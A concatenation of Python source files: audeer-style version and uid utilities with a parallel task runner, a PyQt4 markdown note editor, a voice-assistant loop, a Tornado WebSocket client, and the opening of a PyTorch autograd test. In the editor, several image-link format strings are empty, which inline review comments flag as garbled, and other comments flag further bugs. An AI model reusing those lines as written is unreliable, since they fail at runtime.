        'v1.0.0'

    """
    try:
        output = subprocess.check_output(
            ['git', 'describe', '--tags', '--always'],
        )
        version = output.decode().strip()
    except Exception:  # pragma: nocover
        version = '<unknown>'
    # Normalize the 'v' prefix according to the requested style
    # (this also prefixes the '<unknown>' fallback, as before).
    has_prefix = version.startswith('v')
    if has_prefix and not v:  # pragma: nocover (only local)
        return version[1:]
    if not has_prefix and v:  # pragma: nocover (only github)
        return f'v{version}'
    return version
def is_semantic_version(version: str) -> bool:
    r"""Check if given string represents a `semantic version`_.

    Your version has to comply to ``X.Y.Z`` or ``vX.Y.Z``,
    where X, Y, Z are all integers.
    Additional version information, like ``beta``
    has to be added using a ``-`` or ``+``,
    e.g. ``X.Y.Z-beta``.

    .. _semantic version: https://semver.org

    Args:
        version: version string

    Returns:
        ``True`` if version is a semantic version

    Example:
        >>> is_semantic_version('v1')
        False
        >>> is_semantic_version('1.2.3-r3')
        True
        >>> is_semantic_version('v0.7.2-9-g1572b37')
        True

    """
    parts = version.split('.')
    if len(parts) < 3:
        return False
    major, minor = parts[0], parts[1]
    # Ignore starting 'v'
    if major.startswith('v'):
        major = major[1:]
    # Z may carry extra info after '-' or '+',
    # but no additional '.' before such a separator.
    patch = '.'.join(parts[2:]).split('-')[0].split('+')[0]
    if '.' in patch:
        return False
    for component in (major, minor, patch):
        try:
            int(component)
        except ValueError:
            return False
    return True
def is_uid(uid: str) -> bool:
    r"""Check if string is a unique identifier.

    Unique identifiers can be generated with :func:`audeer.uid`.
    A valid identifier is the canonical 36 character form
    with ``-`` at position 9, 14, 19, 24.

    Args:
        uid: string

    Returns:
        ``True`` if string is a unique identifier

    """
    if uid is None:
        return False
    if not isinstance(uid, str):
        return False
    # uuid.UUID() also accepts non-canonical spellings (32 hex characters
    # without dashes, '{...}' braces, 'urn:uuid:...'), none of which
    # uid() ever produces -> require the canonical 36 character length.
    if len(uid) != 36:
        return False
    try:
        uuid.UUID(uid, version=1)
    except ValueError:
        return False
    return True
def run_tasks(
        task_func: typing.Callable,
        params: typing.Sequence[
            typing.Tuple[
                typing.Sequence[typing.Any],
                typing.Dict[str, typing.Any],
            ]
        ],
        *,
        num_workers: int = 1,
        multiprocessing: bool = False,
        progress_bar: bool = False,
        task_description: str = None
) -> typing.Sequence[typing.Any]:
    r"""Run parallel tasks using multiprocessing.

    .. note:: Result values are returned in order of ``params``.

    Args:
        task_func: task function with one or more
            parameters, e.g. ``x, y, z``, and optionally returning a value
        params: sequence of tuples holding parameters for each task.
            Each tuple contains a sequence of positional arguments and a
            dictionary with keyword arguments, e.g.:
            ``[((x1, y1), {'z': z1}), ((x2, y2), {'z': z2}), ...]``
        num_workers: number of parallel jobs or 1 for sequential
            processing. If ``None`` will be set to the number of
            processors on the machine multiplied by 5 in case of
            multithreading and number of processors in case of
            multiprocessing
        multiprocessing: use multiprocessing instead of multithreading
        progress_bar: show a progress bar
        task_description: task description
            that will be displayed next to progress bar

    Example:
        >>> power = lambda x, n: x ** n
        >>> params = [([2, n], {}) for n in range(10)]
        >>> run_tasks(power, params, num_workers=3)
        [1, 2, 4, 8, 16, 32, 64, 128, 256, 512]

    """
    # One result slot per task.  Previously this was ``max(1, len(params))``,
    # which returned a spurious ``[None]`` for an empty ``params``.
    results = [None] * len(params)

    if num_workers == 1:  # sequential
        with tqdm.progress_bar(
            params,
            total=len(params),
            desc=task_description,
            disable=not progress_bar,
        ) as pbar:
            for index, param in enumerate(pbar):
                results[index] = task_func(*param[0], **param[1])
    else:  # parallel
        if multiprocessing:
            executor = concurrent.futures.ProcessPoolExecutor
        else:
            executor = concurrent.futures.ThreadPoolExecutor
        # ``num_workers=None`` lets the executor pick its default
        # (CPUs * 5 for threads, CPU count for processes).
        with executor(max_workers=num_workers) as pool:
            with tqdm.progress_bar(
                total=len(params),
                desc=task_description,
                disable=not progress_bar,
            ) as pbar:
                futures = []
                for param in params:
                    future = pool.submit(task_func, *param[0], **param[1])
                    # Advance the progress bar as soon as each task finishes.
                    future.add_done_callback(lambda p: pbar.update())
                    futures.append(future)
                # Collect in submission order so results match ``params``.
                for idx, future in enumerate(futures):
                    result = future.result()
                    results[idx] = result

    return results
@deprecated(removal_version='2.0.0', alternative='run_tasks')
def run_worker_threads(
        task_fun: typing.Callable,
        params: typing.Sequence[typing.Any] = None,
        *,
        num_workers: int = None,
        progress_bar: bool = False,
        task_description: str = None
) -> typing.Sequence[typing.Any]:  # pragma: no cover
    r"""Run parallel tasks using worker threads.

    .. note:: Result values are returned in order of ``params``.

    Args:
        task_fun: task function with one or more
            parameters, e.g. ``x, y, z``, and optionally returning a value
        params: list of parameters (use tuples in case of multiple parameters)
            for each task, e.g. ``[(x1, y1, z1), (x2, y2, z2), ...]``
        num_workers: number of worker threads (defaults to number of available
            CPUs multiplied by ``5``)
        progress_bar: show a progress bar
        task_description: task description
            that will be displayed next to progress bar

    Example:
        >>> power = lambda x, n: x ** n
        >>> params = [(2, n) for n in range(10)]
        >>> run_worker_threads(power, params, num_workers=3)
        [1, 2, 4, 8, 16, 32, 64, 128, 256, 512]

    """
    if params is None:
        params = []
    num_tasks = max(1, len(params))
    results = [None] * num_tasks
    if num_workers is None:
        num_workers = multiprocessing.cpu_count() * 5
    # Ensure num_workers is positive
    num_workers = max(1, num_workers)
    # Do not use more workers as needed
    num_workers = min(num_workers, num_tasks)

    # num_workers == 1 -> run sequentially
    if num_workers == 1:
        for index, param in enumerate(params):
            # A tuple/list parameter is unpacked as multiple arguments.
            if type(param) in (list, tuple):
                results[index] = task_fun(*param)
            else:
                results[index] = task_fun(param)

    # num_workers > 1 -> run parallel
    else:
        # Create queue, possibly with a progress bar
        if progress_bar:
            class QueueWithProgbar(queue.Queue):
                # Queue subclass that advances a progress bar on task_done().
                def __init__(self, num_tasks, maxsize=0):
                    super().__init__(maxsize)
                    self.pbar = tqdm.progress_bar(
                        total=num_tasks,
                        desc=task_description,
                    )

                def task_done(self):
                    super().task_done()
                    self.pbar.update(1)
            q = QueueWithProgbar(num_tasks)
        else:
            q = queue.Queue()

        # Fill queue
        for index, param in enumerate(params):
            q.put((index, param))

        # Define worker thread
        def _worker():
            # Process items until a None sentinel is received.
            while True:
                item = q.get()
                if item is None:
                    break
                index, param = item
                if type(param) in (list, tuple):
                    results[index] = task_fun(*param)
                else:
                    results[index] = task_fun(param)
                q.task_done()

        # Start workers
        threads = []
        for i in range(num_workers):
            t = threading.Thread(target=_worker)
            t.start()
            threads.append(t)

        # Block until all tasks are done
        q.join()

        # Stop workers
        for _ in range(num_workers):
            q.put(None)
        for t in threads:
            t.join()

    return results
def sort_versions(
        versions: typing.List[str],
) -> typing.List:
    """Sort version numbers.

    A leading ``v`` is ignored while sorting.

    Args:
        versions: sequence with semantic version numbers

    Returns:
        sorted list of versions with highest as last entry

    Raises:
        ValueError: if the version does not comply
            with :func:`is_semantic_version`

    Example:
        >>> vers = [
        ...     '2.0.0',
        ...     '2.0.1',
        ...     'v1.0.0',
        ...     'v2.0.0-1-gdf29c4a',
        ... ]
        >>> sort_versions(vers)
        ['v1.0.0', '2.0.0', 'v2.0.0-1-gdf29c4a', '2.0.1']

    """
    for candidate in versions:
        if not is_semantic_version(candidate):
            raise ValueError(
                "All version numbers have to be semantic versions, "
                "following 'X.Y.Z', "
                "where X, Y, Z are integers. "
                f"But your version is: '{candidate}'."
            )
    return sorted(
        versions,
        key=lambda vn: LooseVersion(vn[1:] if vn.startswith('v') else vn),
    )
def to_list(x: typing.Any):
    """Convert to list.

    Strings and non-iterables are wrapped as ``[x]``;
    any other iterable is converted with :class:`list`.

    Args:
        x: input to be converted to a list

    Returns:
        input as a list

    Example:
        >>> to_list('abc')
        ['abc']
        >>> to_list((1, 2, 3))
        [1, 2, 3]

    """
    if isinstance(x, str) or not isinstance(x, Iterable):
        return [x]
    return list(x)
def uid(
        *,
        from_string: str = None,
) -> str:
    r"""Generate unique identifier.

    Args:
        from_string: create a unique identifier
            by hashing the provided string.
            This will return the same identifier
            for identical strings.
            If ``None`` :func:`uuid.uuid1` is used.

    Returns:
        unique identifier containing 36 characters
        with ``-`` at position 9, 14, 19, 24

    Example:
        >>> uid(from_string='example_string')
        '626f68e6-d336-70b9-e753-ed9fad855840'

    """
    if from_string is None:
        return str(uuid.uuid1())
    # Deterministic variant: MD5 digest formatted like a UUID.
    digest = hashlib.md5(from_string.encode('utf-8')).hexdigest()
    return '-'.join([
        digest[0:8],
        digest[8:12],
        digest[12:16],
        digest[16:20],
        digest[20:],
    ])
|
mikiedit.py | import os
from multiprocessing import Process
from PyQt4.QtCore import Qt, QDir, QFile, QFileInfo, QMimeData, QIODevice, QTextStream, QUrl
from PyQt4.QtGui import QAction, QCursor, QFileDialog, QFont, QTextCursor, QTextEdit, QMessageBox
from PyQt4.QtNetwork import QNetworkAccessManager, QNetworkRequest
import markdown
from whoosh.index import open_dir
import html2text
from .utils import LineEditDialog, parseTitle
class MikiEdit(QTextEdit):
    """Markdown note editor widget.

    Extends QTextEdit with markdown-aware paste/drag-and-drop, attachment
    handling, optional pyenchant spell checking, whoosh index updates on
    save, and HTML export.
    """

    def __init__(self, parent=None):
        super(MikiEdit, self).__init__(parent)
        self.parent = parent
        self.settings = parent.settings
        self.setFontPointSize(12)
        self.setVisible(False)
        # Whoosh full-text index of the notebook.
        self.ix = open_dir(self.settings.indexdir)

        # Spell checker support
        try:
            import enchant
            enchant.Dict()
            self.speller = enchant.Dict()
        except ImportError:
            print("Spell checking unavailable. Need to install pyenchant.")
            self.speller = None
        except enchant.errors.DictNotFoundError:
            print("Spell checking unavailable. Need to install dictionary (e.g. aspell-en).")
            self.speller = None

        # Build file-dialog filter strings from the configured
        # attachment extensions.
        self.imageFilter = ""
        self.documentFilter = ""
        for ext in self.settings.attachmentImage:
            self.imageFilter += " *" + ext
        for ext in self.settings.attachmentDocument:
            self.documentFilter += " *" + ext
        self.imageFilter = "Image (" + self.imageFilter.strip() + ")"
        self.documentFilter = "Document (" + self.documentFilter.strip() + ")"
        # Target path for the attachment currently being downloaded.
        self.downloadAs = ""
        self.networkManager = QNetworkAccessManager()
        self.networkManager.finished.connect(self.downloadFinished)

    def updateIndex(self):
        ''' Update whoosh index, which cost much computing resource '''
        page = self.parent.notesTree.currentPage()
        content = self.toPlainText()
        try:
            writer = self.ix.writer()
            writer.update_document(
                path=page, title=parseTitle(content, page), content=content)
            writer.commit()
        except:
            # NOTE(review): bare except silently swallows every failure,
            # including programming errors -- confirm this is intended.
            print("Whoosh commit failed.")

    def downloadFinished(self, reply):
        # Slot for QNetworkAccessManager.finished: write the downloaded
        # attachment to self.downloadAs.
        if reply.error():
            print("Failed to download")
        else:
            attFile = QFile(self.downloadAs)
            attFile.open(QIODevice.WriteOnly)
            attFile.write(reply.readAll())
            attFile.close()
            print("Succeeded")
        reply.deleteLater()

    def mimeFromText(self, text):
        # Wrap plain text in a QMimeData object.
        mime = QMimeData()
        mime.setText(text)
        return mime

    def createMimeDataFromSelection(self):
        """ Reimplement this to prevent copied text taken as hasHtml() """
        plaintext = self.textCursor().selectedText()
        # From QTextCursor doc:
        # if the selection obtained from an editor spans a line break,
        # the text will contain a Unicode U+2029 paragraph separator character
        # instead of a newline \n character
        text = plaintext.replace('\u2029', '\n')
        return self.mimeFromText(text)

    def insertFromMimeData(self, source):
        """ Intended behavior
        If copy/drag something that hasUrls, then check the extension name:
            if image then apply image pattern ![text](url)
            else apply link pattern [text](http://example.net)
        If copy/drag something that hasImage, then ask for file name
        If copy/drag something that hasHtml, then html2text
        Else use the default insertFromMimeData implementation
        """
        item = self.parent.notesTree.currentItem()
        attDir = self.parent.notesTree.itemToAttachmentDir(item)
        if not QDir(attDir).exists():
            QDir().mkpath(attDir)

        if source.hasUrls():
            for qurl in source.urls():
                url = qurl.toString()
                filename, extension = os.path.splitext(url)
                filename = os.path.basename(filename)
                newFilePath = os.path.join(attDir, filename + extension)
                relativeFilePath = newFilePath.replace(self.settings.notebookPath, "..")
                attachments = self.settings.attachmentImage + self.settings.attachmentDocument
                if QUrl(qurl).isLocalFile():
                    # Local file: copy it into the attachment directory.
                    if extension.lower() in attachments:
                        nurl = url.replace("file://", "")
                        QFile.copy(nurl, newFilePath)
                        self.parent.updateAttachmentView()
                    if extension.lower() in self.settings.attachmentImage:
                        # NOTE(review): image-markdown format string appears
                        # garbled/lost in this copy of the file -- original
                        # was presumably "![%s](%s)\n"; confirm upstream.
                        text = "" % (filename, relativeFilePath)
                    elif extension.lower() in self.settings.attachmentDocument:
                        text = "[%s%s](%s)\n" % (filename, extension, relativeFilePath)
                    else:
                        text = "[%s%s](%s)\n" % (filename, extension, url)
                else:
                    # Remote file: download asynchronously into attDir.
                    if extension.lower() in attachments:
                        self.downloadAs = newFilePath
                        self.networkManager.get(QNetworkRequest(qurl))
                    if extension.lower() in self.settings.attachmentImage:
                        # NOTE(review): same garbled image format string as above.
                        text = "" % (filename, relativeFilePath)
                    elif extension.lower() in self.settings.attachmentDocument:
                        text = "[%s%s](%s)\n" % (filename, extension, relativeFilePath)
                    else:
                        text = "[%s%s](%s)\n" % (filename, extension, url)
                super(MikiEdit, self).insertFromMimeData(self.mimeFromText(text))
        elif source.hasImage():
            # Raw image data: ask for a file name, save, insert reference.
            img = source.imageData()
            attDir = self.parent.notesTree.itemToAttachmentDir(item)
            dialog = LineEditDialog(attDir, self)
            if dialog.exec_():
                fileName = dialog.editor.text()
                if not QFileInfo(fileName).suffix():
                    fileName += '.jpg'
                filePath = os.path.join(attDir, fileName)
                img.save(filePath)
                relativeFilePath = filePath.replace(self.settings.notebookPath, "..")
                # NOTE(review): same garbled image format string as above.
                text = "" % (fileName, relativeFilePath)
                super(MikiEdit, self).insertFromMimeData(self.mimeFromText(text))
        elif source.hasHtml():
            # Convert pasted HTML back to markdown before inserting.
            backToMarkdown = html2text.HTML2Text()
            html = source.html()
            markdown = backToMarkdown.handle(html)
            super(MikiEdit, self).insertFromMimeData(self.mimeFromText(markdown))
        else:
            super(MikiEdit, self).insertFromMimeData(source)

    def insertAttachment(self, filePath, fileType):
        # Copy filePath into the current item's attachment directory and
        # insert a markdown reference at the cursor.
        item = self.parent.notesTree.currentItem()
        attDir = self.parent.notesTree.itemToAttachmentDir(item)
        filename, extension = os.path.splitext(filePath)
        filename = os.path.basename(filename)
        newFilePath = os.path.join(attDir, filename + extension)
        relativeFilePath = newFilePath.replace(self.settings.notebookPath, "..")
        QFile.copy(filePath, newFilePath)
        self.parent.updateAttachmentView()
        if fileType == self.imageFilter:
            # NOTE(review): same garbled image format string as above.
            text = "" % (filename, relativeFilePath)
        else:
            text = "[%s%s](%s)\n" % (filename, extension, relativeFilePath)
        self.insertPlainText(text)

    def insertAttachmentWrapper(self):
        # File-dialog front end for insertAttachment().
        (filePath, fileType) = QFileDialog.getOpenFileNameAndFilter(
            self, self.tr('Insert attachment'), '',
            self.imageFilter + ";;" + self.documentFilter)
        if filePath == "":
            return
        self.insertAttachment(filePath, fileType)

    def contextMenuEvent(self, event):
        # Standard context menu, extended with up to 10 spelling
        # suggestions for the word under the mouse cursor.
        def correctWord(cursor, word):
            # From QTextCursor doc:
            # if there is a selection, the selection is deleted and replaced
            return lambda: cursor.insertText(word)

        popup_menu = self.createStandardContextMenu()

        # Spellcheck the word under mouse cursor, not self.textCursor
        cursor = self.cursorForPosition(event.pos())
        cursor.select(QTextCursor.WordUnderCursor)
        text = cursor.selectedText()
        if self.speller and text:
            if not self.speller.check(text):
                lastAction = popup_menu.actions()[0]
                for word in self.speller.suggest(text)[:10]:
                    action = QAction(word, popup_menu)
                    action.triggered.connect(correctWord(cursor, word))
                    action.setFont(QFont("sans", weight=QFont.Bold))
                    popup_menu.insertAction(lastAction, action)
                popup_menu.insertSeparator(lastAction)
        popup_menu.exec_(event.globalPos())

    def keyPressEvent(self, event):
        """ for Qt.Key_Tab, expand as 4 spaces
            for other keys, use default implementation
        """
        if event.key() == Qt.Key_Tab:
            self.insertPlainText('    ')
        else:
            QTextEdit.keyPressEvent(self, event)

    def save(self, item):
        # Write the editor content to the item's file and fork an index
        # update process.
        pageName = self.parent.notesTree.itemToPage(item)
        filePath = self.parent.notesTree.itemToFile(item)
        htmlFile = self.parent.notesTree.itemToHtmlFile(item)  # NOTE(review): unused here
        fh = QFile(filePath)
        try:
            if not fh.open(QIODevice.WriteOnly):
                raise IOError(fh.errorString())
        except IOError as e:
            QMessageBox.warning(self, 'Save Error',
                'Failed to save %s: %s' % (pageName, e))
            raise
        finally:
            # NOTE(review): this finally block also runs when open() failed,
            # streaming into an unopened QFile in that case -- confirm.
            if fh is not None:
                savestream = QTextStream(fh)
                savestream << self.toPlainText()
                fh.close()
        self.document().setModified(False)
        # Fork a process to update index, which benefit responsiveness.
        Process(target=self.updateIndex).start()

    def toHtml(self):
        '''markdown.Markdown.convert v.s. markdown.markdown
        Previously `convert` was used, but it doens't work with fenced_code
        '''
        htmltext = self.toPlainText()
        return markdown.markdown(htmltext, self.settings.extensions)
        # md = markdown.Markdown(extensions)
        # return md.convert(htmltext)

    def saveAsHtml(self, htmlFile = None):
        """ Save as Complete (with css and images) or HTML Only
            To be merged with saveNoteAs
        """
        if not htmlFile:
            (htmlFile, htmlType) = QFileDialog.getSaveFileNameAndFilter(
                self, self.tr("Export to HTML"), "", "Complete;;HTML Only")
            if htmlFile == '':
                return
            if not QFileInfo(htmlFile).suffix():
                htmlFile += '.html'
        # NOTE(review): htmlType is unbound when htmlFile was passed in by
        # the caller -- that path raises UnboundLocalError. Confirm callers
        # always pass None.
        if htmlType == "Complete":
            self.saveCompleteHtml(htmlFile)
        else:
            self.saveHtmlOnly(htmlFile)

    def saveCompleteHtml(self, htmlFile):
        # Export with the notebook's CSS inlined into the document.
        html = QFile(htmlFile)
        html.open(QIODevice.WriteOnly)
        savestream = QTextStream(html)
        css = QFile(self.settings.cssfile)
        css.open(QIODevice.ReadOnly)
        # Use a html lib may be a better idea?
        savestream << "<html><head><meta charset='utf-8'></head>"
        # Css is inlined.
        savestream << "<style>"
        savestream << QTextStream(css).readAll()
        savestream << "</style>"
        # Note content
        savestream << self.toHtml()
        savestream << "</html>"
        html.close()

    def saveHtmlOnly(self, htmlFile):
        # Export referencing an external stylesheet instead of inlining it.
        fileDir = os.path.dirname(htmlFile)
        QDir().mkpath(fileDir)
        html = QFile(htmlFile)
        html.open(QIODevice.WriteOnly)
        savestream = QTextStream(html)
        savestream << """
<html><head>
<meta charset="utf-8">
<link rel="stylesheet" href="/css/notebook.css" type="text/css" />
</head>
"""
        # Note content
        savestream << self.toHtml()
        savestream << "</html>"
        html.close()
|
main.py | import json
from listener import Listener
from reproducer import reproduce
from unidecode import unidecode
from register_commands import get_current_manager
from commands import *
from Gui import Gui
from speech_recognition import UnknownValueError
import Twitter
import threading
# Shared speech recognizer and the registry of voice commands used by run().
listener = Listener()
manager = get_current_manager()
# Wake word: the assistant only reacts once this word is recognized.
activator = "jarbas"
def run(wait_for_jarbas=True):
    """Serve one voice command.

    When *wait_for_jarbas* is true, block until the wake word is heard
    first.  Returns whether the NEXT call should wait for the wake word
    again (False after a failed/unknown command, so the user can retry
    immediately).  Uses the module-level `listener`, `manager`,
    `activator` and the `interface` GUI created under __main__.
    """
    response = ""
    while wait_for_jarbas:
        try:
            response = unidecode(listener.listen().lower())
        except UnknownValueError:
            print("Não falou jarbas.")
            interface.setUserSpeech(response)
            continue
        if activator in response:
            print("Falou jarbas.")
            interface.setUserSpeech(response)
            interface.mic_on()
            break
        print("Não falou jarbas.")
    repeat_text = "Fala comigo." if wait_for_jarbas else "Por favor, tente novamente."
    # Prompt until we get a recognizable utterance.
    while True:
        try:
            reproduce(repeat_text)
            response = unidecode(listener.listen().lower())
        except UnknownValueError:
            interface.setJarbasSpeech("Desculpe, não entendi.")
            reproduce("Desculpe, não entendi.")
            repeat_text = "Por favor, tente novamente."
            print("Erro de reconhecimento.")
            continue
        interface.setUserSpeech(response)
        break
    wait_next_time = True
    try:
        command, text = manager.find_matching_command_and_text(response)
        command_audio_response = command().run(text)
        # Keep only BMP characters (code point < 0x10000); presumably the
        # TTS/GUI backend cannot render astral-plane characters — TODO
        # confirm.  (Replaces the original O(n^2) char-by-char concat.)
        command_audio_response = ''.join(
            ch for ch in command_audio_response if ord(ch) < 65536)
        interface.setJarbasSpeech(command_audio_response)
        reproduce(command_audio_response)
        interface.mic_off()
    except LookupError:
        # No command matched the utterance.
        interface.setJarbasSpeech("Desculpe, não entendi.")
        reproduce("Desculpe, não entendi.")
        wait_next_time = False
    except Exception as e:
        print(e)
        interface.setJarbasSpeech("Ocorreu um erro inesperado.")
        reproduce("Ocorreu um erro inesperado.")
        wait_next_time = False
    return wait_next_time
def listening_loop():
    """Background loop: keep serving voice commands until the GUI exits.

    `run` returns whether the next iteration should wait for the wake word
    again; `state['running']` is flipped off by the main thread on exit.
    """
    should_wait_for_jarbas = True
    while state["running"]:
        should_wait_for_jarbas = run(should_wait_for_jarbas)
if __name__ == "__main__":
    # Shared flag read by the listener thread; cleared on GUI exit.
    state = {
        'running': True
    }

    def sendCallback(consumer_key, consumer_secret, key, secret):
        """Persist Twitter credentials to creds.json and (re)configure the API."""
        with open("creds.json", 'w') as creds:
            creds.write(json.dumps({
                "consumer_key": consumer_key,
                "consumer_secret": consumer_secret,
                "key": key,
                "secret": secret
            }))
        Twitter.my_twitter.set_api(consumer_key, consumer_secret, key, secret)

    # Load previously saved credentials, if any.  A missing or corrupt file
    # just means the user must authenticate again via the GUI.  The original
    # opened the file OUTSIDE its try block, so a first run with no
    # creds.json crashed with FileNotFoundError; the bare `except:` also
    # swallowed KeyboardInterrupt and friends.
    creds = {}
    try:
        with open("creds.json", 'r') as creds_file:
            creds = json.load(creds_file)
    except (OSError, json.JSONDecodeError):
        pass
    if creds:
        Twitter.my_twitter.set_api(**creds)
    interface = Gui(sendCallback, creds)
    listen_thread = threading.Thread(target=listening_loop)
    listen_thread.start()
    interface.mainloop()
    # GUI closed: stop the listener thread and wait for it to finish.
    state['running'] = False
    listen_thread.join()
|
socketClient.py |
from tornado import escape
from tornado import gen
from tornado import httpclient
from tornado import httputil
from tornado import ioloop
from tornado import websocket
from collections import deque
import threading
import json
# MIME type sent with the initial HTTP upgrade request.
APPLICATION_JSON = 'application/json'

# Default timeouts in seconds for connecting and for individual requests.
DEFAULT_CONNECT_TIMEOUT = 60
DEFAULT_REQUEST_TIMEOUT = 60
class WebSocketClient(object):
    """Minimal Tornado-based WebSocket client with overridable callbacks."""

    def __init__(self, *, connect_timeout=DEFAULT_CONNECT_TIMEOUT,
                 request_timeout=DEFAULT_REQUEST_TIMEOUT):
        self.connect_timeout = connect_timeout
        self.request_timeout = request_timeout
        # Set by _connect_callback on success; None means "not connected".
        # The original never initialized this, so calling send()/close()
        # before connecting raised AttributeError instead of the intended
        # RuntimeError below.
        self._ws_connection = None

    def connect(self, url):
        """Connect to the server.

        :param str url: server URL.
        """
        self._ioloop = ioloop.IOLoop()
        headers = httputil.HTTPHeaders({'Content-Type': APPLICATION_JSON})
        request = httpclient.HTTPRequest(url=url,
                                         connect_timeout=self.connect_timeout,
                                         request_timeout=self.request_timeout,
                                         headers=headers)
        self.ws_conn = websocket.WebSocketClientConnection(self._ioloop,
                                                           request)
        self._ioloop.add_future(self.ws_conn.connect_future, self._connect_callback)

    def _connect_callback(self, future):
        # Dispatch to the success/error hooks once the connect future resolves.
        if future.exception() is None:
            self._ws_connection = future.result()
            self._on_connection_success()
            self._read_messages()
        else:
            self._on_connection_error(future.exception())

    def send(self, data):
        """JSON-encode *data* and write it to the open connection."""
        if not self._ws_connection:
            raise RuntimeError('Web socket connection is closed.')
        self._ws_connection.write_message(escape.utf8(json.dumps(data)))

    def close(self, future):
        """Close connection.

        *future* is unused; the signature matches an IOLoop ``add_future``
        callback so subclasses can schedule close() directly.
        """
        if not self._ws_connection:
            raise RuntimeError('Web socket connection is already closed.')
        self._ws_connection.close()

    @gen.coroutine
    def _read_messages(self):
        # Pump messages until the server closes (read_message yields None).
        while True:
            msg = yield self._ws_connection.read_message()
            if msg is None:
                self._on_connection_close()
                break
            self._on_message(msg)

    def _on_message(self, msg):
        """This is called when a new message is available from the server.

        :param str msg: server message.
        """

    def _on_connection_success(self):
        """This is called on successful connection to the server."""
        pass

    def _on_connection_close(self):
        """This is called when the server closed the connection."""
        pass

    def _on_connection_error(self, exception):
        """This is called in case the connection to the server could
        not be established."""
        pass
class UsefulWebSocket1(WebSocketClient):
    """WebSocketClient that runs its IOLoop on a dedicated thread and
    queues outgoing messages until the connect future resolves."""

    def __init__(self, url):
        self.url = url
        # Outgoing messages buffer; _send pops one entry per queued future.
        self.data_deque = deque()
        super(UsefulWebSocket1, self).__init__()

    def connect(self):
        super(UsefulWebSocket1, self).connect(self.url)
        # Spin the IOLoop on its own thread so connect()/send() do not
        # block the caller.
        self._ioloop_thread = threading.Thread(target=self._run_ioloop)
        self._ioloop_thread.start()

    def send(self, data):
        self.data_deque.append(data)
        # Defer the actual write until the connection is established; if
        # already connected, the future is done and _send runs promptly.
        self._ioloop.add_future(self.ws_conn.connect_future, self._send)

    def _send(self, future):
        super(UsefulWebSocket1, self).send(self.data_deque.popleft())

    def _run_ioloop(self):
        self._ioloop.start()

    def _stop_ioloop(self, future):
        # stop() must run on the loop's own thread, hence add_callback.
        self._ioloop.add_callback(self._ioloop.stop)

    def close_(self):
        # Order matters: close the websocket first, then stop the loop.
        self._ioloop.add_future(self.ws_conn.connect_future, super(UsefulWebSocket1, self).close)
        self._ioloop.add_future(self.ws_conn.connect_future, self._stop_ioloop)

    def _on_connection_close(self):
        self.close_()
        print('Connection Closed')

    def _on_connection_success(self):
        print('Connection Open')

    def _on_connection_error(self, exception):
        print('Connection closed due to: ', exception)
class UsefulWebSocket(object):
    """Fire-and-forget sender: opens a fresh UsefulWebSocket1 per message."""

    def __init__(self, url, receiver, algorithm=None):
        self.url = url
        self.receiver = receiver
        # Bug fix: send() reads self.algorithm, but the original never
        # assigned it, so every send() raised AttributeError.  The new
        # parameter defaults to None, keeping the old signature valid.
        self.algorithm = algorithm

    def send(self, data):
        """Wrap *data* in the routing envelope and send it."""
        print(data)
        ws = UsefulWebSocket1(self.url)
        ws.connect()
        ws.send({'receiver': self.receiver, 'algorithm': self.algorithm, 'method': data})

    def resend(self, data):
        """Send an already-built message dict unchanged."""
        ws = UsefulWebSocket1(self.url)
        ws.connect()
        ws.send(data)
class SocketModel3D(UsefulWebSocket):
    """UsefulWebSocket preconfigured for the 'model3D' receiver."""

    def __init__(self, url):
        super().__init__(url, 'model3D')
class SocketCFD(UsefulWebSocket):
    """UsefulWebSocket preconfigured for the 'CFD' receiver."""

    def __init__(self, url):
        super().__init__(url, 'CFD')
class SocketDesign(UsefulWebSocket):
    """UsefulWebSocket preconfigured for the 'design' receiver."""

    def __init__(self, url):
        super().__init__(url, 'design')
class SocketHandler(UsefulWebSocket):
    """UsefulWebSocket preconfigured for the 'handler' receiver."""

    def __init__(self, url):
        super().__init__(url, 'handler')
|
test_autograd.py | import contextlib
import gc
import sys
import io
import math
import random
import tempfile
import time
import threading
import unittest
import warnings
from copy import deepcopy
from collections import OrderedDict
from itertools import product, permutations
from operator import mul
from functools import reduce, partial
import torch
from torch import nn
from torch._six import inf, nan
from torch.autograd.function import once_differentiable
from torch.autograd.profiler import (profile, format_time, EventList,
FunctionEvent, FunctionEventAvg,
record_function, emit_nvtx)
import torch.autograd.functional as autogradF
from torch.utils.checkpoint import checkpoint
from torch.testing._internal.common_cuda import TEST_CUDA
from torch.testing._internal.common_utils import (TestCase, run_tests, skipIfNoLapack,
suppress_warnings, slowTest,
load_tests,
IS_WINDOWS, IS_MACOS, CudaMemoryLeakCheck,
TEST_WITH_ROCM,
gradcheck, gradgradcheck, make_tensor)
from torch.autograd import Variable, Function, detect_anomaly, kineto_available
from torch.autograd.function import InplaceFunction
import torch.autograd.forward_ad as fwAD
from torch.testing import randn_like
from torch.testing._internal.common_methods_invocations import (method_tests,
create_input, unpack_variables,
EXCLUDE_FUNCTIONAL, EXCLUDE_GRADCHECK,
EXCLUDE_GRADGRADCHECK,
EXCLUDE_GRADGRADCHECK_BY_TEST_NAME,
exclude_tensor_method,
mask_not_all_zeros,
S)
from torch.testing._internal.common_device_type import (instantiate_device_type_tests, skipCUDAIfRocm,
onlyCPU, onlyCUDA, onlyOnCPUAndCUDA, dtypes, dtypesIfCUDA,
deviceCountAtLeast, skipCUDAIfCudnnVersionLessThan,
skipCUDAIf)
# Unique marker distinguishing "attribute absent" from a legitimate None.
_END_SENTINEL = object()


def getattr_qualified(obj, qname, default=None):
    """Like getattr, but accepts dotted (qualified) attribute names.

    e.g. getattr_qualified(torch, 'fft.rfft')
    """
    target = obj
    for part in qname.split('.'):
        target = getattr(target, part, _END_SENTINEL)
        if target is _END_SENTINEL:
            return default
    return target
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests

import pickle

# Default numeric tolerance used by the checks in this file.
PRECISION = 1e-4
@contextlib.contextmanager
def backward_engine(engine):
    """Temporarily swap autograd's execution engine; restore it on exit."""
    _prev_engine = Variable._execution_engine
    Variable._execution_engine = engine()
    try:
        yield
    finally:
        Variable._execution_engine = _prev_engine
def graph_desc(fn):
    """Render an autograd graph rooted at *fn* as a nested-call string,
    e.g. ``AddBackward0(AccumulateGrad(), None)``."""
    if fn is None:
        return 'None'
    children = [graph_desc(next_fn) for next_fn, _ in fn.next_functions]
    return '{}({})'.format(type(fn).__name__, ', '.join(children))
class TestAutograd(TestCase):
    def test_tensor_grad_warnings(self):
        """.grad access warns only on non-leaves that don't retain grad."""
        dummy = torch.empty(1)

        with warnings.catch_warnings(record=True) as w:
